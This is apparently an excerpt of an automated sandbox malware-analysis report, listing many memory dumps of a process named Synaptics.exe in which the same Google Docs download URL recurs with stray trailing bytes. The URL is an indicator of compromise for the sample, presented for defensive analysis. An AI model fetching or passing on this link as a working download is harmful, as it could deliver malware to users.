                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5O
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5yb
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6=
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6d
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7w
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3038297262.000000001877E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                            Source: Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8&s-h
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download88OZ~
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8Of#
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8a
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8w
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8yo
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9=
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9l
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:b
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:m
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;R
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;xl#
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=09n
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=Hc
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=q9/
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=r9
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=t9
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=x1.
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=x9&
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Q
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Z2)b6
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?u
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?v
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                            Source: Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA&
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAw
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB#
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBm
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBt
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBulu
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000918000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH-U
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCSH
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCd
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD=
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDe
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDn
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDu8
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDv
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEo
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFgXJG
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG?X
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGRD#
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGSXr(
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGcY
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH-UA5
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHc
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHl
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIVLOD
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIZ
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIv
